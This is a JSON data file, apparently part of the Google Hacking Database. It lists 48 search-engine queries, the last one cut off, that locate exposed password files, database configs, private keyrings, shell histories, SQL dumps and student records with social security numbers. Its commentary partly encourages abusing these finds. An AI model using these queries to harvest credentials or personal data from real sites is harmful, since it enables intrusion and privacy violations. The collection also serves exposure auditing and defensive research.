/data/ghdb.json

[
    {
        "signatureReferenceNumber": "1", 
        "link": "https://www.exploit-db.com/ghdb/1/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=%22cacheserverreport+for%22+%22This+analysis+was+produced+by+calamaris%22", 
        "shortDescription": "squid cache server reports", 
        "textualDescription": "These are squid server cache reports. Fairly benign, really except when you consider using them for evil purposes. For example, an institution stands up a proxy server for their internal users to get to the outside world. Then, the internal user surf all over to their hearts content (including intranet pages cuz well, the admins are stupid) Voila, intranet links show up in the external cache report. Want to make matters worse for yourself as an admin? OK, configure your external proxy server as a trusted internal host. Load up your web browser, set your proxy as their proxy and surf your way into their intranet. Not that I've noticed any examples of this in this google list. *COUGH* *COUGH* *COUGH*  unresolved DNS lookups give clues *COUGH* *COUGH* ('scuse me. must be a furball) OK, lets say BEST CASE scenario. Let's say there's not security problems revealed in these logs. Best case scenario is that outsiders can see what your company/agency/workers are surfing."
    }, 
    {
        "signatureReferenceNumber": "2", 
        "link": "https://www.exploit-db.com/ghdb/2/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Ganglia%22+%22Cluster+Report+for%22", 
        "shortDescription": "Ganglia Cluster Reports", 
        "textualDescription": "These are server cluster reports, great for info gathering. Lesse, what were those server names again?"
    }, 
    {
        "signatureReferenceNumber": "3", 
        "link": "https://www.exploit-db.com/ghdb/3/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Index+of%22+dbconvert%2Eexe+chats", 
        "shortDescription": "ICQ chat logs, please...", 
        "textualDescription": "ICQ (http://www.icq.com) allows you to store the contents of your online chats into a file. These folks have their entire ICQ directories online. On purpose?"
    }, 
    {
        "signatureReferenceNumber": "4", 
        "link": "https://www.exploit-db.com/ghdb/4/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Apache+HTTP+Server%22+intitle%3A%22documentation%22", 
        "shortDescription": "Apache online documentation", 
        "textualDescription": "When you install the Apache web server, you get a nice set of online documentation. When you learn how to use Apache, your supposed to delete these online Apache manuals. These sites didn't. If they're in such a hurry with Apache installs, I wonder what else they rushed through?"
    }, 
    {
        "signatureReferenceNumber": "5", 
        "link": "https://www.exploit-db.com/ghdb/5/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=%22Error+Diagnostic+Information%22+intitle%3A%22Error+Occurred+While%22+", 
        "shortDescription": "Coldfusion Error Pages", 
        "textualDescription": "These aren't too horribly bad, but there are SO MANY of them. These sites got googlebotted while the site was having \"technical difficulties.\" The resulting cached error message gives lots of juicy tidbits about the target site."
    }, 
    {
        "signatureReferenceNumber": "6", 
        "link": "https://www.exploit-db.com/ghdb/6/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Index+of%22+finance.xls", 
        "shortDescription": "Financial spreadsheets: finance.xls", 
        "textualDescription": "\"Hey! I have a great idea! Let's put our finances on our website in a secret directory so we can get to it whenever we need to!\""
    }, 
    {
        "signatureReferenceNumber": "7", 
        "link": "https://www.exploit-db.com/ghdb/7/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Index+of%22+finances.xls", 
        "shortDescription": "Financial spreadsheets: finances.xls", 
        "textualDescription": "\"Hey! I have a great idea! Let's put our finances on our website in a secret directory so we can get to it whenever we need to!\""
    }, 
    {
        "signatureReferenceNumber": "8", 
        "link": "https://www.exploit-db.com/ghdb/8/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22%23+Dumping+data+for+table%22", 
        "shortDescription": "sQL data dumps", 
        "textualDescription": "sQL database dumps. LOTS of data in these. So much data, infact, I'm pressed to think of what else an ev1l hax0r would like to know about a target database.. What's that? Usernames and passwords you say? Patience, grasshopper....."
    }, 
    {
        "signatureReferenceNumber": "9", 
        "link": "https://www.exploit-db.com/ghdb/9/", 
        "category": "Files containing usernames", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Index+of%22+%2Ebash%5Fhistory", 
        "shortDescription": "bash_history files", 
        "textualDescription": "Ok, this file contains what a user typed at a shell command prompt. You shouldn't advertise this file. You shouldn't flash it to a web crawler. It contains COMMANDS and USERNAMES and stuff... *sigh* Sometimes there aren't words to describe how lame people can be. This particular theme can be carried further to find all sorts of things along these lines like .profile, .login, .logout files, etc. I just got bored with all the combinations..."
    }, 
    {
        "signatureReferenceNumber": "10", 
        "link": "https://www.exploit-db.com/ghdb/10/", 
        "category": "Files containing usernames", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Index+of%22+.sh_history", 
        "shortDescription": "sh_history files", 
        "textualDescription": "Ok, this file contains what a user typed at a shell command prompt. You shouldn't advertise this file. You shouldn't flash it to a web crawler. It contains COMMANDS and USERNAMES and stuff... *sigh* Sometimes there aren't words to describe how lame people can be. This particular theme can be carried further to find all sorts of things along these lines like .profile, .login, .logout files, etc. I just got bored with all the combinations..."
    }, 
    {
        "signatureReferenceNumber": "11", 
        "link": "https://www.exploit-db.com/ghdb/11/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Index+of%22+%2Emysql%5Fhistory", 
        "shortDescription": "mysql history files", 
        "textualDescription": "The .mysql_history file contains commands that were performed against a mysql database. A \"history\" of said commands. First, you shouldn't show this file to anyone, especially not a MAJOR SEARCH ENGINE! Secondly, I sure hope you wouldn't type anything sensitive while interacting with your databases, like oh say USERNAMES AND PASSWORDS..."
    }, 
    {
        "signatureReferenceNumber": "12", 
        "link": "https://www.exploit-db.com/ghdb/12/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Index+of%22+mt%2Ddb%2Dpass%2Ecgi", 
        "shortDescription": "mt-db-pass.cgi files", 
        "textualDescription": "These folks had the technical prowess to unpack the movable type files, but couldn't manage to set up their web servers properly. Check the mt.cfg files for interesting stuffs..."
    }, 
    {
        "signatureReferenceNumber": "13", 
        "link": "https://www.exploit-db.com/ghdb/13/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?q=intitle:%22Welcome+to+Windows+2000+Internet+Services%22&num=100&hl=en&lr=&ie=UTF-8&filter=0", 
        "shortDescription": "Windows 2000 Internet Services", 
        "textualDescription": "At first glance, this search reveals even more examples of operating system users enabling the operating system default web server software. This is generally accepted to be a Bad Idea(TM) as mentioned in the previous example. However, the googleDork index on this particular category gets quite a boost from the fact that this particular screen should NEVER be seen by the general public. To quote the default index screen: \"Any users attempting to connect to this site are currently receiving an 'Under Construction page'\" THIS is not the 'Under Construction page.' I was only able to generate this screen while sitting at the console of the server. The fact that this screen is revealed to the general public may indicate a misconfiguration of a much more insidious nature..."
    }, 
    {
        "signatureReferenceNumber": "14", 
        "link": "https://www.exploit-db.com/ghdb/14/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?q=intitle:%22Welcome+to+IIS+4.0%22&num=100&hl=en&lr=&ie=UTF-8&filter=0", 
        "shortDescription": "IIS 4.0", 
        "textualDescription": "Moving from personal, lightweight web servers into more production-ready software, we find that even administrators of Microsoft's Internet Information Server (IIS) sometimes don't have a clue what they're doing. By searching on web pages with titles of \"Welcome to IIS 4.0\" we find that even if they've taken the time to change their main page, some dorks forget to change the titles of their default-installed web pages. This is an indicator that their web server is most likely running, or was upgraded from, the now considered OLD IIS 4.0 and that at least portions of their main pages are still exactly the same as they were out of the box. Conclusion? The rest of the factory-installed stuff is most likely lingering around on these servers as well. Old code: FREE with operating system.Poor content management: an average of $40/hour. Factory-installed default scripts: FREE with operating system.Getting hacked by a script kiddie that found you on Google: PRICELESS.For all the things money can't buy, there's a googleDork award."
    }, 
    {
        "signatureReferenceNumber": "15", 
        "link": "https://www.exploit-db.com/ghdb/15/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?q=%22Index+of+/backup%22&num=100&hl=en&lr=&ie=UTF-8&filter=0", 
        "shortDescription": "Look in my backup directories! Please?", 
        "textualDescription": "Backup directories are often very interesting places to explore. More than one server has been compromised by a hacker's discovery of sensitive information contained in backup files or directories. Some of the sites in this search meant to reveal the contents of their backup directories, others did not. Think about it. What.s in YOUR backup directories? Would you care to share the contents with the whole of the online world? Probably not. Whether intentional or not, bsp.gsa.gov reveals backup directory through Google. Is this simply yet another misconfigured .gov site? You decide. BSP stands for \"best security practices,\" winning this site the Top GoogleDork award for this category."
    }, 
    {
        "signatureReferenceNumber": "16", 
        "link": "https://www.exploit-db.com/ghdb/16/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?sourceid=navclient&q=%22powered+by+openbsd%22+%2B%22powered+by+apache%22", 
        "shortDescription": "OpenBSD running Apache", 
        "textualDescription": "I like the OpenBSD operating system. I really do. And I like the Apache web server software. Honestly. I admire the mettle of administrators who take the time to run quality, secure software. The problem is that you never know when security problems will pop up. A BIG security problem popped up within the OpenBSD/Apache combo back in the day.Now, every administrator that advertised this particular combo with cute little banners has a problem. Hackers can find them with Google. I go easy on these folks since the odds are they.ve patched their sites already. Then again, they may just show up on zone-h.."
    }, 
    {
        "signatureReferenceNumber": "17", 
        "link": "https://www.exploit-db.com/ghdb/17/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?q=intitle:index.of+intext:%22secring.skr%22%7C%22secring.pgp%22%7C%22secring.bak%22", 
        "shortDescription": "intitle:index.of intext:\"secring.skr\"|\"secring.pgp\"|\"secring.bak\"", 
        "textualDescription": "PGP is a great encryption technology. It keeps secrets safe. Everyone from drug lords to the head of the DEA can download PGP to encrypt their sensitive documents. Everyone, that is except googleDorks. GoogleDorks, it seems, don't understand that anyone in possession of your private keyring (secring) can get to your secret stuff. It should noever be given out, and should certainly not be posted on the Internet. The highest ranking is awarded for this surprising level of ineptitude."
    }, 
    {
        "signatureReferenceNumber": "18", 
        "link": "https://www.exploit-db.com/ghdb/18/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?sourceid=navclient&q=intitle%3A%22Index+of%22+%22people%2Elst%22", 
        "shortDescription": "people.lst", 
        "textualDescription": "*sigh*"
    }, 
    {
        "signatureReferenceNumber": "19", 
        "link": "https://www.exploit-db.com/ghdb/19/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=intitle%3A%22Index+of%22+passwd+passwd.bak", 
        "shortDescription": "passwd", 
        "textualDescription": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The hits in this search show \"passwd\" files which contain encrypted passwords which may look like this: \"guest MMCHhvZ6ODgFo\" A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!"
    }, 
    {
        "signatureReferenceNumber": "20", 
        "link": "https://www.exploit-db.com/ghdb/20/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?sourceid=navclient&q=intitle%3A%22Index+of%22+master%2Epasswd", 
        "shortDescription": "master.passwd", 
        "textualDescription": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The hits in this search show \"master.passwd\" files which contain encrypted passwords which may look like this: \"guest MMCHhvZ6ODgFo\" A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!For master.passwd, be sure to check other files in the same directory..."
    }, 
    {
        "signatureReferenceNumber": "21", 
        "link": "https://www.exploit-db.com/ghdb/21/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?sourceid=navclient&q=intitle%3A%22Index+of%22+pwd%2Edb", 
        "shortDescription": "pwd.db", 
        "textualDescription": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The his in this search show \"pwd.db\" files which contain encrypted passwords which may look like this: \"guest MMCHhvZ6ODgFo\" A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!"
    }, 
    {
        "signatureReferenceNumber": "22", 
        "link": "https://www.exploit-db.com/ghdb/22/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&safe=off&q=intitle%3A%22Index+of%22+%22.htpasswd%22+htpasswd.bak", 
        "shortDescription": "htpasswd / htpasswd.bak", 
        "textualDescription": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!"
    }, 
    {
        "signatureReferenceNumber": "23", 
        "link": "https://www.exploit-db.com/ghdb/23/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?q=intitle:%22Index+of%22+%22.htpasswd%22+%22htgroup%22++-intitle:%22dist%22+-apache+-htpasswd.c&hl=en&lr=&ie=UTF-8&safe=off&start=10&sa=N", 
        "shortDescription": "htpasswd / htgroup", 
        "textualDescription": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!You'll need to sift through these results a bit..."
    }, 
    {
        "signatureReferenceNumber": "24", 
        "link": "https://www.exploit-db.com/ghdb/24/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?q=intitle:%22Index+of%22+spwd.db+passwd+-pam.conf&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&start=10&sa=N", 
        "shortDescription": "spwd.db / passwd", 
        "textualDescription": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!"
    }, 
    {
        "signatureReferenceNumber": "25", 
        "link": "https://www.exploit-db.com/ghdb/25/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&safe=off&q=intitle%3A%22Index+of..etc%22+passwd", 
        "shortDescription": "passwd / etc (reliable)", 
        "textualDescription": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!"
    }, 
    {
        "signatureReferenceNumber": "26", 
        "link": "https://www.exploit-db.com/ghdb/26/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=buddylist%2Eblt", 
        "shortDescription": "AIM buddy lists", 
        "textualDescription": "These searches bring up common names for AOL Instant Messenger \"buddylists\". These lists contain screen names of your \"online buddies\" in Instant Messenger. Not that's not too terribly exciting or stupid unless you want to mess with someone's mind, and besides, some people make these public on purpose. The thing that's interesting are the files that get stored ALONG WITH buddylists. Often this stuff includes downloaded pictures, resumes, all sorts of things. This is really for the peepers out there, and it' possible to spend countless hours rifling through people's personal crap. Also try buddylist.blt, buddy.blt, buddies.blt."
    }, 
    {
        "signatureReferenceNumber": "27", 
        "link": "https://www.exploit-db.com/ghdb/27/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?sourceid=navclient&q=intitle%3A%22Index+of%22+config%2Ephp", 
        "shortDescription": "config.php", 
        "textualDescription": "This search brings up sites with \"config.php\" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database. Way to go, googleDorks!!"
    }, 
    {
        "signatureReferenceNumber": "28", 
        "link": "https://www.exploit-db.com/ghdb/28/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=intitle%3Aphpinfo+%22PHP+Version%22&btnG=Search", 
        "shortDescription": "phpinfo()", 
        "textualDescription": "this brings up sites with phpinfo(). There is SO much cool stuff in here that you just have to check one out for yourself! I mean full blown system versioning, SSL version, sendmail version and path, ftp, LDAP, SQL info, Apache mods, Apache env vars, *sigh* the list goes on and on! Thanks \"joe!\" =)"
    }, 
    {
        "signatureReferenceNumber": "29", 
        "link": "https://www.exploit-db.com/ghdb/29/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=ISO-8859-1&q=%22supplied+argument+is+not+a+valid+MySQL+result+resource%22", 
        "shortDescription": "MYSQL error message: supplied argument....", 
        "textualDescription": "One of many potential error messages that spew interesting information. The results of this message give you real path names inside the webserver as well as more php scripts for potential \"crawling\" activities."
    }, 
    {
        "signatureReferenceNumber": "30", 
        "link": "https://www.exploit-db.com/ghdb/30/", 
        "category": "Vulnerable Files", 
        "querystring": null, 
        "shortDescription": "The Master List", 
        "textualDescription": "CLick on any of the following links to show google's list!_vti_inf.html (694 hits)service.pwd (11,800 hits)users.pwd (23 hits)authors.pwd (22 hits)administrators.pwd (22 hits)shtml.dll (780 hits)shtml.exe (761 hits)fpcount.exe (1,370 hits)default.asp (2,170 hits)showcode.asp (4 hits)sendmail.cfm (5 hits)getFile.cfm (7 hits)imagemap.exe (510 hits)test.bat (353 hits)msadcs.dll (8 hits)htimage.exe (513 hits)counter.exe (164 hits)browser.inc (11 hits)hello.bat (18 hits)default.asp\\\\ (2,170 hits)dvwssr.dll (571 hits)dvwssr.dll (571 hits)dvwssr.dll (571 hits)cart32.exe (9 hits)add.exe (38 hits)index.JSP (998 hits)index.jsp (998 hits)SessionServlet (46 hits)shtml.dll (780 hits)index.cfm (473 hits)page.cfm (5 hits)shtml.exe (761 hits)web_store.cgi (16 hits)shop.cgi (63 hits)upload.asp (27 hits)default.asp (2,170 hits)pbserver.dll (6 hits)phf (370 hits)test-cgi (1,560 hits)finger (23,900 hits)Count.cgi (8,710 hits)jj (5,600 hits)php.cgi (170 hits)php (48,000 hits)nph-test-cgi (132 hits)handler (9,220 hits)webdist.cgi (35 hits)webgais (37 hits)websendmail (12 hits)faxsurvey (27 hits)htmlscript (50 hits)perl.exe (340 hits)wwwboard.pl (455 hits)www-sql (26,500 hits)view-source (641 hits)campas (94 hits)aglimpse (12 hits)glimpse (4,530 hits)man.sh (127 hits)AT-admin.cgi (789 hits)AT-generate.cgi (14 hits)filemail.pl (5 hits)maillist.pl (16 hits)info2www (737 hits)files.pl (267 hits)bnbform.cgi (91 hits)survey.cgi (93 hits)classifieds.cgi (25 hits)wrap (14,000 hits)cgiwrap (1,270 hits)edit.pl (114 hits)perl (80,700 hits)names.nsf (12 hits)webgais (37 hits)dumpenv.pl (7 hits)test.cgi (1,560 hits)submit.cgi (79 hits)submit.cgi (79 hits)guestbook.cgi (528 hits)guestbook.pl (451 hits)cachemgr.cgi (25 hits)responder.cgi (4 hits)perlshop.cgi (30 hits)query (15,500 hits)w3-msql (877 hits)plusmail (12 hits)htsearch (177 hits)infosrch.cgi (19 hits)publisher (2,610 hits)ultraboard.cgi (24 hits)db.cgi (96 hits)formmail.cgi (420 hits)allmanage.pl (5 hits)ssi (9,550 hits)adpassword.txt (39 hits)redirect.cgi (60 hits)f (124,000 hits)cvsweb.cgi (78 hits)login.jsp (241 hits)login.jsp (241 hits)dbconnect.inc (18 hits)admin (57,000 hits)htgrep (30 hits)wais.pl (133 hits)amadmin.pl (14 hits)subscribe.pl (65 hits)news.cgi (387 hits)auctionweaver.pl (2 hits).htpasswd (2,390 hits)acid_main.php (3 hits)access_log (1,250 hits)access-log (618 hits)access.log (618 hits)log.htm (386 hits)log.html (1,310 hits)log.txt (987 hits)logfile (23,200 hits)logfile.htm (76 hits)logfile.html (671 hits)logfile.txt (701 hits)logger.html (37 hits)stat.htm (398 hits)stats.htm (687 hits)stats.html (1,840 hits)stats.txt (342 hits)webaccess.htm (11 hits)wwwstats.html (80 hits)source.asp (11 hits)perl (80,700 hits)mailto.cgi (46 hits)YaBB.pl (35 hits)mailform.pl (670 hits)cached_feed.cgi (6 hits)cr (27,500 hits)global.cgi (14 hits)Search.pl (548 hits)build.cgi (74 hits)common.php (184 hits)common.php (184 hits)show (33,500 hits)global.inc (114 hits)ad.cgi (21 hits)WSFTP.LOG (11 hits)index.html~ (81,100 hits)index.php~ (6,740 hits)index.html.bak (690 hits)index.php.bak (69 hits)print.cgi (61 hits)register.cgi (172 hits)webdriver (35 hits)bbs_forum.cgi (45 hits)mysql.class (21 hits)sendmail.inc (97 hits)CrazyWWWBoard.cgi (68 hits)search.pl (548 hits)way-board.cgi (44 hits)webpage.cgi (89 hits)pwd.dat (22 hits)adcycle (12 hits)post-query (240 hits)help.cgi (69 hits)"
    }, 
    {
        "signatureReferenceNumber": "31", 
        "link": "https://www.exploit-db.com/ghdb/31/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=intitle:Index.of+robots.txt&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&start=10&sa=N", 
        "shortDescription": "robots.txt", 
        "textualDescription": "The robots.txt file contains \"rules\" about where web spiders are allowed (and NOT allowed) to look in a website's directory structure. Without over-complicating things, this means that the robots.txt file gives a mini-roadmap of what's somewhat public and what's considered more private on a web site. Have a look at the robots.txt file itself, it contains interesting stuff.However, don't forget to check out the other files in these directories since they are usually at the top directory level of the web server!"
    }, 
    {
        "signatureReferenceNumber": "32", 
        "link": "https://www.exploit-db.com/ghdb/32/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=intitle%3Aindex.of+passlist", 
        "shortDescription": "passlist", 
        "textualDescription": "I'm not sure what uses this, but the passlist and passlist.txt files contain passwords in CLEARTEXT! That's right, no decoding/decrypting/encrypting required. How easy is this?*sigh*Supreme googledorkage"
    }, 
    {
        "signatureReferenceNumber": "33", 
        "link": "https://www.exploit-db.com/ghdb/33/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?q=intitle:index.of.secret&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&start=0&sa=N", 
        "shortDescription": "secret", 
        "textualDescription": "What kinds of goodies lurk in directories marked as \"secret?\" Find out..."
    }, 
    {
        "signatureReferenceNumber": "34", 
        "link": "https://www.exploit-db.com/ghdb/34/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex%2Eof%2Eprivate", 
        "shortDescription": "private", 
        "textualDescription": "What kinds of things might you find in directories marked \"private?\" let's find out...."
    }, 
    {
        "signatureReferenceNumber": "35", 
        "link": "https://www.exploit-db.com/ghdb/35/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=intitle%3Aindex.of.etc", 
        "shortDescription": "etc (index.of)", 
        "textualDescription": "This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!"
    }, 
    {
        "signatureReferenceNumber": "36", 
        "link": "https://www.exploit-db.com/ghdb/36/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=intitle%3Aindex.of.winnt", 
        "shortDescription": "winnt", 
        "textualDescription": "The \\WINNT directory is the directory that Windows NT is installed into by default. Now just because google can find them, this doesn't necessarily mean that these are Windows NT directories that made their way onto the web. However, sometimes this happens. Other times, they aren't Windows NT directories, but backup directories for Windows NT data. Wither way, worthy of a nomination."
    }, 
    {
        "signatureReferenceNumber": "37", 
        "link": "https://www.exploit-db.com/ghdb/37/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?q=intitle:%22index.of.secure%22&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&start=0&sa=N", 
        "shortDescription": "secure", 
        "textualDescription": "What could be hiding in directories marked as \"secure?\" let's find out..."
    }, 
    {
        "signatureReferenceNumber": "38", 
        "link": "https://www.exploit-db.com/ghdb/38/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=inurl%3Aindex.of.protected&btnG=Google+Search", 
        "shortDescription": "protected", 
        "textualDescription": "What could be in a directory marked as \"protected?\" Let's find out..."
    }, 
    {
        "signatureReferenceNumber": "39", 
        "link": "https://www.exploit-db.com/ghdb/39/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?q=inurl:index.of.password&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&start=0&sa=N", 
        "shortDescription": "index.of.password", 
        "textualDescription": "These directories are named \"password.\" I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named \"password\" and single html files inside named things liks \"horny.htm\" or \"brittany.htm.\" These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn..."
    }, 
    {
        "signatureReferenceNumber": "40", 
        "link": "https://www.exploit-db.com/ghdb/40/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=%22This+report+was+generated+by+WebLog%22", 
        "shortDescription": "\"This report was generated by WebLog\"", 
        "textualDescription": "These are weblog-generated statistics for web sites... A roadmap of files, referrers, errors, statistics... yummy... a schmorgasbord! =P"
    }, 
    {
        "signatureReferenceNumber": "41", 
        "link": "https://www.exploit-db.com/ghdb/41/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=%22These+statistics+were+produced+by+getstats%22", 
        "shortDescription": "\"produced by getstats\"", 
        "textualDescription": "Another web statistics package. This one originated from a google scan of an ivy league college. *sigh*There's sooo much stuff in here!"
    }, 
    {
        "signatureReferenceNumber": "42", 
        "link": "https://www.exploit-db.com/ghdb/42/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22This+summary+was+generated+by+wwwstat%22", 
        "shortDescription": "\"generated by wwwstat\"", 
        "textualDescription": "More www statistics on the web. This one is very nice.. Lots of directory info, and client access statistics, email addresses.. lots os good stuff.You know, these are SOOO dangerous, especially if INTRANET users get logged... talk about mapping out an intranet quickly...thanks, sac =)"
    }, 
    {
        "signatureReferenceNumber": "43", 
        "link": "https://www.exploit-db.com/ghdb/43/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex%2Eof+haccess%2Ectl", 
        "shortDescription": "haccess.ctl (one way)", 
        "textualDescription": "this is the frontpage(?) equivalent of htaccess, I believe. Anyhow, this file describes who can access the directory of the web server and where the other authorization files are. nice find."
    }, 
    {
        "signatureReferenceNumber": "44", 
        "link": "https://www.exploit-db.com/ghdb/44/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=filetype%3Ahtaccess+Basic", 
        "shortDescription": "haccess.ctl (VERY reliable)", 
        "textualDescription": "haccess.ctl is the frontpage(?) equivalent of the .htaccess file. Either way, this file decribes who can access a web page, and should not be shown to web surfers. Way to go, googledork. =PThis method is very reliable due to the use of this google query:filetype:ctl BasicThis pulls out the file by name then searches for a string inside of it (Basic) which appears in the standard template for this file."
    }, 
    {
        "signatureReferenceNumber": "45", 
        "link": "https://www.exploit-db.com/ghdb/45/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Axls+username+password+email", 
        "shortDescription": "filetype:xls username password email", 
        "textualDescription": "This search shows Microsoft Excel spreadsheets containing the words username, password and email. Beware that there are a ton of blank \"template\" forms to weed through, but you can tell from the Google summary that some of these are winners... err losers.. depending on your perspective."
    }, 
    {
        "signatureReferenceNumber": "46", 
        "link": "https://www.exploit-db.com/ghdb/46/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3Ashop+%22Hassan+Consulting%27s+Shopping+Cart+Version+1%2E18%22", 
        "shortDescription": "Hassan Consulting's Shopping Cart Version 1.18", 
        "textualDescription": "These servers can be messed with in many ways. One specific way is by way of the \"../\" bug. This lets you cruise around the web server in a somewhat limited fashion."
    }, 
    {
        "signatureReferenceNumber": "47", 
        "link": "https://www.exploit-db.com/ghdb/47/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=site%3Aedu+grades+admin", 
        "shortDescription": "site:edu admin grades", 
        "textualDescription": "I never really thought about this until I started coming up with juicy examples for DEFCON 11.. A few GLARINGLY bad examples contain not only student grades and names, but also social security numbers, securing the highest of all googledork ratings!"
    }, 
    {
        "signatureReferenceNumber": "48", 
        "link": "https://www.exploit-db.com/ghdb/48/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=allinurl%3Aauth_user_file.txt", 
        "shortDescription": "auth_user_file.txt", 
